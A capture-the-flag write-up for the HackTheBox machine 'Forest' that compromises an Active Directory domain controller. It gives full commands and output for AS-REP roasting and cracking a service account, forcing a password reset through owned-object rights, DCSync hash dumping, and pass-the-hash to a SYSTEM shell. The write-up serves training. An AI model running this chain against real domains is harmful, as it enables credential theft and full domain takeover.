[HackTheBox] Forest

Just another RPC / Port ranges / NTLMSSP / ASREPRoast / User DACL Abuse (RPC passwd) / DCSync Write-up.

There might be some discrepancies in this article: I will sometimes use cme, and at other times nxc. The methodology, however, remains identical; in the context of this article, cme and nxc are interchangeable.

Machine link.

IppSec Walkthrough.

Footprinting

Open ports

For a change, I used masscan for the TCP port scan, coupled with an Nmap Scripting Engine (NSE) scan to look for vulnerabilities on each open service of the target:

jamarir@kali:~$ sudo masscan -p1-65535 10.10.10.161 --rate=1000 -e tun0 > ports
jamarir@kali:~$ cat ports
Discovered open port 49703/tcp on 10.10.10.161
Discovered open port 445/tcp on 10.10.10.161
Discovered open port 139/tcp on 10.10.10.161
Discovered open port 9389/tcp on 10.10.10.161
Discovered open port 5985/tcp on 10.10.10.161
Discovered open port 3269/tcp on 10.10.10.161
Discovered open port 49665/tcp on 10.10.10.161
Discovered open port 47001/tcp on 10.10.10.161
Discovered open port 49677/tcp on 10.10.10.161
Discovered open port 389/tcp on 10.10.10.161
Discovered open port 464/tcp on 10.10.10.161
Discovered open port 49664/tcp on 10.10.10.161
Discovered open port 49684/tcp on 10.10.10.161
Discovered open port 49676/tcp on 10.10.10.161
Discovered open port 3268/tcp on 10.10.10.161
Discovered open port 49670/tcp on 10.10.10.161
Discovered open port 636/tcp on 10.10.10.161
Discovered open port 49666/tcp on 10.10.10.161
Discovered open port 88/tcp on 10.10.10.161
Discovered open port 49667/tcp on 10.10.10.161
Discovered open port 53/tcp on 10.10.10.161
Discovered open port 135/tcp on 10.10.10.161
Discovered open port 593/tcp on 10.10.10.161
jamarir@kali:~$ nmap -Pn -sV -sC 10.10.10.161 -v2 -oN nse.nmap -p$(grep -oPz '(?s)(?<=Discovered open port )\d+(?=\/tcp)' ports |tr '\0' '\n' |sort -u |tr '\n' ',' |grep -oP '.*(?=.)')
[...]
PORT      STATE SERVICE      REASON          VERSION
53/tcp    open  domain       syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: <DATE>)
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 127
593/tcp   open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped   syn-ack ttl 127
3268/tcp  open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped   syn-ack ttl 127
5985/tcp  open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       syn-ack ttl 127 .NET Message Framing
47001/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49684/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
49703/tcp open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
[...]
|_clock-skew: mean: 2h46m51s, deviation: 4h37m09s, median: 6m50s

The NetBIOS/SMB (139/445), RPC (135, 593) and WinRM (5985) services reveal this is a Windows machine.

The LDAP/S (389/636), DNS (53), but especially the Kerberos (88) services reveal this machine is a DC (Domain Controller).

First things first, let’s add that machine to our local DNS resolver:

jamarir@kali:~$ sudo sed -i '1i nameserver 10.10.10.161' /etc/resolv.conf

I ran the above command on a Kali virtual machine. If you’re running a Windows attacker machine, you’ll have to update the DNS settings of your OpenVPN network adapter instead:

Also, because the machine has port 445 open, we may do a quick CrackMapExec enumeration on that SMB protocol to get its FQDN (Fully Qualified Domain Name): FOREST.htb.local

jamarir@kali:~$ cme smb 10.10.10.161
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)

What are these RPC’s 496xy ports ?!

TLDR: RPC is a default Windows service, accessible on ports 135 (RPC), 139/445 (Netbios/SMB), 593 (HTTP), or 49xyz+.

You may check the Microsoft documentation on RPC, on Service overview and network port requirements for Windows, RFC6335 for the IANA (Internet Assigned Numbers Authority)’s port registration, or Hacktricks, among many resources, to get more details about the RPC protocol.

MSRPC (Microsoft Remote Procedure Call) is a client-server protocol that allows programs to send commands over the network. RPC handles most of the networking work, which lets programmers focus on the application’s details rather than on networking issues. For instance, developers can transparently communicate between different types of processes (32-bit, 64-bit, 32-bit under a 64-bit system (WOW64)), letting RPC manage the differences between them behind the scenes.

This protocol can be accessed through:

  • RPC on port 135.

  • SMB on port 139/445.

  • HTTP on port 593.

But what are all these 49??? ports in Nmap’s output? As RFC6335 states, there are three kinds of port ranges:

  • The System / Well Known Ports, from 0-1023, assigned by IANA.

  • The User / Registered Ports, from 1024-49151, assigned by IANA.

  • The Dynamic / Private / Ephemeral Ports, from 49152-65535, never assigned.

Thus, the ports 49152 to 65535 are free for the system to use. Most frequently, these ports are assigned to client programs to open a temporary session on a target. For example, when a client visits an HTTPS website, the server-side port is 443, but the client-side port used for the communication is any port from 49152 upwards.

For example, on a default Windows 11 machine, we can see some of the same ports (496xy) open as on our target:

PS C:\Users\jamarir> netstat -ano |Select-String -Pattern '(?<=\[::\]:496\d{2}.*)\d+(\s*)$' |findstr /v '^$'
  TCP    [::]:49664             [::]:0                 LISTENING       784
  TCP    [::]:49665             [::]:0                 LISTENING       628
  TCP    [::]:49666             [::]:0                 LISTENING       1436
  TCP    [::]:49667             [::]:0                 LISTENING       1920
  TCP    [::]:49669             [::]:0                 LISTENING       2944
  TCP    [::]:49670             [::]:0                 LISTENING       764

We may retrieve these services’ names using the following PowerShell tricks:

PS C:\Users\jamarir> (netstat -ano |Select-String -Pattern '(?<=\[::\]:496\d{2}.*)\d+(\s*)$').Matches.Value -Join ','
784,628,1436,1920,2944,764
PS C:\Users\jamarir> Get-Process -Id 784,628,1436,1920,2944,764

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1398      27     7324      21924               784   0 lsass
    661      13     4868      10200               764   0 services
    421      21     5156      13224              2944   0 spoolsv
    400      19     5892      16576              1436   0 svchost
    415      14    15420      14816              1920   0 svchost
    142      11     1408       6652               628   0 wininit

We could also have simply used the Process Explorer tool from the Sysinternals suite.

Without going into too much detail (and honestly, I wouldn’t be able to):

More details can be found in the nasbench’s article.

  • lsass.exe is the LSA (Local Security Authority) Subsystem Service which verifies users logging onto a Windows computer or server, enforces local security policies, handles password changes, creates access tokens, and writes the Windows Security Log. Task Manager shows it’s run by SYSTEM with the description “Local Security Authority Process“.

  • services.exe is the SCM (Service Control Manager), started at system boot. It maintains the database of installed services, starts/stops services upon demand, etc.. Task Manager shows it’s run by SYSTEM with the description “Services and Controller app“.

  • spoolsv.exe (Spooler Service) is an API allowing applications to manage printers and print jobs. Task Manager shows it’s run by SYSTEM with the description “Spooler SubSystem App”.

  • svchost.exe (Service Host) allows groups of services to run in independent instances of the Service Host process, which prevents issues across instances. Task Manager shows it’s run by SERVICE LOCAL with the description “Host Process for Windows Services”.

  • wininit.exe (Windows Initialization) sets the environment variables, creates the W:\Windows\Temp\ folder, launches services.exe / lsass.exe, etc. Task Manager shows it’s run by SYSTEM with the description “Windows Start-Up Application”.

Anonymous Rpc2Users ?

We are allowed to interact anonymously with the RPC service in Kali using the tool rpcclient, or enum4linux:

jamarir@kali:~$ enum4linux -a -u '' -p '' 10.10.10.161 -w htb.local > enum4linux.txt
jamarir@kali:~$ cat enum4linux.txt
[...]
[+]  Getting domain group memberships:

Group: 'Exchange Windows Permissions' (RID: 1121) has member: HTB\Exchange Trusted Subsystem
Group: 'Domain Controllers' (RID: 516) has member: HTB\FOREST$
Group: '$D31000-NSEL5BRJ63V7' (RID: 1133) has member: HTB\EXCH01$
Group: 'Domain Admins' (RID: 512) has member: HTB\Administrator
Group: 'Organization Management' (RID: 1104) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\Administrator
Group: 'Domain Users' (RID: 513) has member: HTB\DefaultAccount
Group: 'Domain Users' (RID: 513) has member: HTB\krbtgt
Group: 'Domain Users' (RID: 513) has member: HTB\$331000-VK4ADACQNUCA
Group: 'Domain Users' (RID: 513) has member: HTB\SM_2c8eef0a09b545acb

[...]
Group: 'Domain Users' (RID: 513) has member: HTB\HealthMailbox0659cc1
Group: 'Domain Users' (RID: 513) has member: HTB\sebastien
Group: 'Domain Users' (RID: 513) has member: HTB\lucinda
Group: 'Domain Users' (RID: 513) has member: HTB\svc-alfresco
Group: 'Domain Users' (RID: 513) has member: HTB\andy
Group: 'Domain Users' (RID: 513) has member: HTB\mark
Group: 'Domain Users' (RID: 513) has member: HTB\santi
Group: 'Domain Guests' (RID: 514) has member: HTB\Guest
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\EXCH01$
Group: 'Managed Availability Servers' (RID: 1120) has member: HTB\Exchange Servers
Group: 'Exchange Servers' (RID: 1118) has member: HTB\EXCH01$
Group: 'Exchange Servers' (RID: 1118) has member: HTB\$D31000-NSEL5BRJ63V7
Group: 'Schema Admins' (RID: 518) has member: HTB\Administrator
Group: 'Service Accounts' (RID: 1148) has member: HTB\svc-alfresco
Group: 'Group Policy Creator Owners' (RID: 520) has member: HTB\Administrator
Group: 'Privileged IT Accounts' (RID: 1149) has member: HTB\Service Accounts
Group: 'Domain Computers' (RID: 515) has member: HTB\EXCH01$
Group: 'Enterprise Admins' (RID: 519) has member: HTB\Administrator
Group: 'Exchange Trusted Subsystem' (RID: 1119) has member: HTB\EXCH01$

Here, we can use RPC via an anonymous SMB session using rpcclient:

jamarir@kali:~$ rpcclient 10.10.10.161 -U '%' -c "enumdomusers;quit" > enumdomusers.txt
jamarir@kali:~$ cat enumdomusers.txt
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
[...]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

And retrieve the usernames using the following grep PCRE expression:

jamarir@kali:~$ grep -oP 'user:\[\K.*?(?=\])' enumdomusers.txt > users.txt

Quick NTLMSSP discussion

Looking at the Wireshark traffic for rpcclient, we can see our attacking machine (10.10.14.20) tries to connect to port 445 (SMB), or port 139 (Netbios) if it failed:

Then, we perform an NTLMSSP authentication, over SMB2, with a blank username and password:

NTLMSSP (NT Lan Manager Security Support Provider) is the NTLM authentication protocol over RPC (where option AuthnSvc=RPC_C_AUTHN_WINNT).

Microsoft NTLM is a Windows Challenge/Response authentication protocol, which is either:

  • Interactive (logon authentication), with 2 entities: client, DC.

  • Noninteractive (client already authenticated), with 3 entities: client, server, DC.

A client is a <domain>/<username>:<NTHash> tuple, where NTHash is calculated based on its password. A noninteractive NTLM authentication process is basically made up of 4 exchanges:

  • The client NEGOTIATEs a connection to a server, sending its username.

  • The server CHALLENGEs the client, asking it to encrypt a nonce (an 8-byte random number).

  • The client AUTHENTICATEs to the server, encrypting the nonce with its NTHash.

  • The server asks the DC if it can replay/check that encryption. If the encryptions match, the DC validates the client’s identity, who can then access the server’s service.

Image taken from Microsoft’s documentation.

The client’s password is NOT sent/disclosed in the network. Instead, its NTHash is used (as for the Kerberos’s KRB_AS_REQ message). This NTHash is only known by 2 entities: the client, and the DC (in its local SAM (Security Account Manager) database). That’s the reason why the server must forward the AUTHENTICATE message to the DC for verification.

Thus, once the NTLM authentication has succeeded, we get our EnumDomainUsers response, with 31 users returned:

These entries are retrieved via the SAMR (SAM Remote) Protocol, a protocol used to manage accounts over the network.

ASREPRoast

You may check my Sauna article for more details on this attack.

We have a bunch of users; let's check whether any of them is ASREPRoastable (i.e. whether we may request a domain user’s TGT without a password):

jamarir@kali:~$ nxc ldap 10.10.10.161 -u users.txt -p '' --kdcHost 10.10.10.161 --asreproast ASREProastables.txt
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[...]
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
LDAP        10.10.10.161    445    FOREST           $krb5asrep$23$svc-alfresco@HTB.LOCAL:b5e67e44a9b56929fe6ba89bc329f735$76e3bc4fa76ba01e8d4cc44517b94d1eaf749895d455429aa90d31d4484b6b82874f8987766db11687a377d179932934b16aff21764f2a70d36a8cc3b7f8ea4ee5db3c269de75cb570a206c06148890cea3e52e0d734b65915bc554e87992d2de4bac46e46b38809eda8bccc0b6b1c739efaa45b62d58744cfe75fd66a99fb9efdba1fe5d58e6654c3c09ac9da56fc523218dc1cafb6c3708ca9c8a09fc799097552d5d87d5ab5d1d1562e98b6c3b72a97720ff6659c55dfebbea142cff49d6817d55e6b1072cd903dbae9c4aeb668f349a3681c6edb3aa2aecf253fd5cfbb3ba1d07893425c

User svc-alfresco is ASREPRoastable. Thus we may request a TGT on its behalf from the DC, and crack the NTHash-encrypted part of the KRB_AS_REP response:

jamarir@kali:~$ john --wordlist=/usr/share/wordlists/rockyou.txt asrep.hash
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)

Nice ! We have the creds HTB.LOCAL\svc-alfresco:s3rvice. This user is a domain user, and has access to the LDAP service:

jamarir@kali:~$ nxc ldap 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.161    389    FOREST           [+] htb.local\svc-alfresco:s3rvice

Then, we can use BloodHound.py as our LDAP collector, and mark svc-alfresco as owned in BloodHound:

jamarir@kali:~$ ./bloodhound.py -u 'svc-alfresco' -p 's3rvice' -d 'HTB.LOCAL' -dc FOREST.HTB.LOCAL -ns 10.10.10.161 -c all --zip

The Service Accounts OU (Organizational Unit) is a member of the Remote Management Users group. This group allows its users to get a remote shell through WinRM (port 5985 on the DC). Therefore, any user in that OU can, transitively, access WinRM.

jamarir@kali:~$ nxc ldap 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' -d 'HTB.LOCAL' --query "(&(memberOf=CN=Remote Management Users,CN=Builtin,DC=HTB,DC=LOCAL))" "objectCategory member"
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.161    389    FOREST           [+] HTB.LOCAL\svc-alfresco:s3rvice
LDAP        10.10.10.161    389    FOREST           [+] Response for object: CN=Privileged IT Accounts,OU=Security Groups,DC=htb,DC=local
LDAP        10.10.10.161    389    FOREST           member:              CN=Service Accounts,OU=Security Groups,DC=htb,DC=local
LDAP        10.10.10.161    389    FOREST           objectCategory:      CN=Group,CN=Schema,CN=Configuration,DC=htb,DC=local

svc-alfresco is in that OU:

jamarir@kali:~$ nxc ldap 10.10.10.161 -u 'svc-alfresco' -p 's3rvice' -d 'HTB.LOCAL' --query "(memberOf=CN=Service Accounts,OU=Security Groups,DC=htb,DC=local)" "distinguishedName"
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
LDAP        10.10.10.161    389    FOREST           [+] HTB.LOCAL\svc-alfresco:s3rvice
LDAP        10.10.10.161    389    FOREST           [+] Response for object: CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
LDAP        10.10.10.161    389    FOREST           distinguishedName:   CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

So we can get a remote shell over the network using evil-winrm, and retrieve the user flag !

jamarir@kali:~$ evil-winrm -i 10.10.10.161 -u 'svc-alfresco' -p 's3rvice'
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Get-Content ../desktop/user.txt
42[...]1c

Privilege Escalation

SVC-ALFRESCO can DACL abuse users ? L4g1t !

In BloodHound, we can look for all the shortest paths to Domain Admins, which returns the following layout:

In particular, SVC-ALFRESCO is said to “own” the domain account MAX, who can himself DCSync. Note that the attack vector path is also applicable to the user BEANI. Indeed, both MAX and BEANI are “owned” by SVC-ALFRESCO, and both can DCSync (=GetChanges + GetChangesAll) the domain:

Looking at the BloodHound’s help popup over the Owns link shows:

This privilege we have as SVC-ALFRESCO on users can be exploited in 2 different ways, as Hacktricks shows:

  • Exploit a “Targeted Kerberoast”, where we set an SPN on the owned user. The targeted user then becomes Kerberoastable, so we may crack its TGS.

  • Force a password update on the targeted user to impersonate him.

Let’s change MAX’s password to newP@ssword2022 using net rpc password:

jamarir@kali:~$ net rpc password 'max' 'newP@ssword2022' -U 'htb.local'/'svc-alfresco'%'s3rvice' -S forest.htb.local

MAX can DCSync ? L4g1t !

Finally, as shown in the BloodHound graph above, MAX can DCSync. We can therefore dump the domain users’ NTHashes:

jamarir@kali:~$ impacket-secretsdump 'htb.local/max:newP@ssword2022'@10.10.10.161
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[...]
htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:883047df6f072ada89dab57def574896:::
htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
sahil:9601:aad3b435b51404eeaad3b435b51404ee:7a8f5acf21f7006f2106cfddf5207484:::
max:9603:aad3b435b51404eeaad3b435b51404ee:fb54d1c05e301e024800c6ad99fe9b45:::
beani:9605:aad3b435b51404eeaad3b435b51404ee:0a8f0259f4a2eb307ec5913983a38c54:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:fbed4bd65897ad2846930f05bc8b93c4:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::
[...]
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

And Pass-The-Hash the Domain Admin Administrator:

jamarir@kali:~$ impacket-psexec 'htb.local/administrator@10.10.10.161' -hashes ':32693b11e6aa90eb43d32c72a07ceea6'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file zrEJBePj.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service ySjR on 10.10.10.161.....
[*] Starting service ySjR.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>

GG WP !

C:\Windows\system32> type c:\Users\Administrator\Desktop\root.txt
c9[...]88
